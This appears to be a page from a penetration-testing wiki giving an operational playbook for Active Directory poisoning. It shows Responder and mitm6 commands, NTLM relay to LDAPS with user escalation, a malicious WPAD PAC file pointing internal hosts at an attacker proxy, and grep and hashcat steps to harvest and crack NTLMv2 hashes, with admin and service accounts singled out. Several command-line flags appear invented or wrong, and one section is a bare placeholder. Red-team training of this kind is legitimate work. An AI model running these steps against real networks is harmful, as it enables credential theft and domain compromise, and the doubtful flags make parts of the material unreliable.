Poisoning Attacks

Understanding AD Poisoning Attacks

Core Concept

Purpose: Intercept and respond to Windows name resolution requests to capture domain NTLM authentication credentials.

Attack Flow:

AD Client → Broadcast Request → Attacker Response → Client Authentication → Domain Credential Capture

Domain-joined Windows client fails to resolve a name via DNS
Client broadcasts name resolution request using Windows protocols
Attacker responds claiming to be the requested service
Client authenticates to attacker using domain NTLM credentials
Attacker captures domain NTLMv2 hash for offline cracking

Requirements: Network access on same subnet, Windows name resolution protocols enabled

Attack Value: Domain credential harvesting without requiring initial system access

LLMNR & NBT-NS Poisoning

Link-Local Multicast Name Resolution (LLMNR)

Purpose: Poison LLMNR or NetBIOS name resolution requests to capture Windows domain authentication credentials.

Requirements:

For LLMNR Poisoning
- Windows clients with LLMNR enabled (default), multicast traffic allowed
For NBT-NS
- NetBIOS over TCP/IP enabled, Windows systems in AD domain

LLMNR & NBT-NS Poisoning with Responder

Step 1:

# Start responder and just wait for authentication events
sudo responder -I eth0 -dw

Step 2:

Just wait for natural authentication event to occur or you can force the authentication.

For more information about forcing authentication, see Authentication Triggers and Forcing Techniques

Place holder for a real example

DHCPv6 Poisoning for AD Environments

IPv6 DHCP Poisoning with AD DNS Takeover

Purpose: Use IPv6 DHCPv6 to become the DNS server for Windows AD clients and capture all authentication attempts.

Requirements: IPv6 enabled Windows AD clients, DHCPv6 client support

Attack Value: Complete DNS control over AD clients, bypasses SMB signing, captures all domain authentication

mitm6 - Advanced IPv6 Attack for AD

# Basic DHCPv6 DNS takeover for AD domain
sudo mitm6 -d company.com

# DHCPv6 with AD domain filtering
sudo mitm6 -d company.com --ignore-nofqdn

# DHCPv6 targeting specific AD hosts
echo "dc01.company.com" > ad_targets.txt
echo "exchange.company.com" >> ad_targets.txt
sudo mitm6 -d company.com --host-allowlist ad_targets.txt

# DHCPv6 with AD relay integration
sudo mitm6 -d company.com --relay-target <DC-IP>

DHCPv6 + NTLM Relay for AD Compromise

# Terminal 1: IPv6 DNS takeover
sudo mitm6 -d company.com --ignore-nofqdn

# Terminal 2: NTLM relay to AD services
python3 ntlmrelayx.py -6 -t ldaps://<DC-IP> --escalate-user <username>

# Terminal 3: Monitor domain authentication
tail -f /var/log/mitm6.log | grep -E "(DOMAIN|company\.com)"

WPAD Poisoning in AD Environments

Web Proxy Auto-Discovery for Domain Credentials

Purpose: Exploit automatic proxy configuration to intercept web traffic and capture domain user credentials.

Requirements: WPAD enabled in browsers, automatic proxy detection, domain users accessing web resources

Attack Value: Captures domain credentials when users authenticate to web applications through proxy

WPAD Attack with Responder for AD

# WPAD poisoning for domain user credentials
sudo responder -I eth0 -wrf --wpad

# WPAD targeting AD domain users
sudo responder -I eth0 --wpad-domain company.com

# WPAD via DHCPv6 for Windows AD clients
sudo responder -I eth0 --dns-wpad --dhcpv6-wpad

Custom WPAD for AD Credential Harvesting

# Create AD-targeted PAC file
cat > wpad.pac << 'EOF'
function FindProxyForURL(url, host) {
    // Target internal AD resources
    if (shExpMatch(host, "*.company.com") || 
        shExpMatch(host, "sharepoint*") ||
        shExpMatch(host, "exchange*")) {
        return "PROXY <attacker-ip>:8080";
    }
    return "DIRECT";
}
EOF

# Serve WPAD file targeting AD services
python3 -m http.server 80 --directory /path/to/wpad/

Integrated AD Poisoning Workflows

Comprehensive AD Credential Harvesting

# Multi-protocol AD poisoning campaign
# Terminal 1: IPv6 attack for modern Windows AD clients
sudo mitm6 -d company.com --ignore-nofqdn

# Terminal 2: IPv4 poisoning for all AD systems
sudo responder -I eth0 -wrf -v

# Terminal 3: Monitor for domain credentials
tail -f /usr/share/responder/logs/*.txt | grep -E "(COMPANY\\|company\.com)"

Targeted AD Poisoning with Relay

# Phase 1: Poisoning for AD credential capture
sudo responder -I eth0 -A  # Analysis mode only

# Phase 2: Relay captured AD authentication
python3 ntlmrelayx.py -tf ad_targets.txt -smb2support

# Phase 3: Force AD authentication via poisoning
# Access non-existent AD service: \\fake-dc\sysvol
net use \\fake-server\netlogon

High-Value AD Target Identification

# Monitor for administrative AD accounts
grep -iE "(admin|service|backup|sql|exchange)" /usr/share/responder/logs/*.txt

# Filter for domain controller authentication
grep -E "(DC[0-9]+|PDC|BDC)" /usr/share/responder/logs/*.txt

# Identify service accounts in AD
grep -E "svc-|service|sql|exchange|backup" /usr/share/responder/logs/*.txt

Post-Capture AD Credential Processing

Domain Credential Extraction and Analysis

# Extract domain credentials from captures
grep "COMPANY\\\\" /usr/share/responder/logs/*.txt > domain_creds.txt

# Format AD credentials for hashcat
cat /usr/share/responder/logs/*.txt | grep "NTLMv2-SSP Hash" | \
    grep -E "(COMPANY\\\\|company\.com)" > ad_hashes.txt

# Identify high-value AD accounts
grep -iE "(admin|da-|service|sql|exchange|backup)" ad_hashes.txt

# Process for domain password cracking
sed 's/.*NTLMv2-SSP Hash     : //' ad_hashes.txt > formatted_ad_hashes.txt
hashcat -m 5600 formatted_ad_hashes.txt /usr/share/wordlists/rockyou.txt

AD Environment Validation

# Confirm domain environment capture
grep -E "DOMAIN\\\\|\.company\.com|DC=" /usr/share/responder/logs/*.txt

# Identify domain controllers from captures
grep -iE "(dc[0-9]+|domain.*controller)" /usr/share/responder/logs/*.txt

# Map AD infrastructure from poisoning
grep -E "(exchange|sharepoint|sql.*server)" /usr/share/responder/logs/*.txt

PreviousNTLM Relay Attacks NextAuthentication Triggers and Forcing Techniques

Last updated 8 months ago

Was this helpful?

Good afternoon

hashtagUnderstanding AD Poisoning Attacks

hashtagCore Concept

hashtagLLMNR & NBT-NS Poisoning

hashtagLink-Local Multicast Name Resolution (LLMNR)

hashtagStep 1:

hashtagStep 2:

hashtagDHCPv6 Poisoning for AD Environments

hashtagIPv6 DHCP Poisoning with AD DNS Takeover

hashtagWPAD Poisoning in AD Environments

hashtagWeb Proxy Auto-Discovery for Domain Credentials

hashtagIntegrated AD Poisoning Workflows

hashtagComprehensive AD Credential Harvesting

hashtagTargeted AD Poisoning with Relay

hashtagHigh-Value AD Target Identification

hashtagPost-Capture AD Credential Processing

hashtagDomain Credential Extraction and Analysis

hashtagAD Environment Validation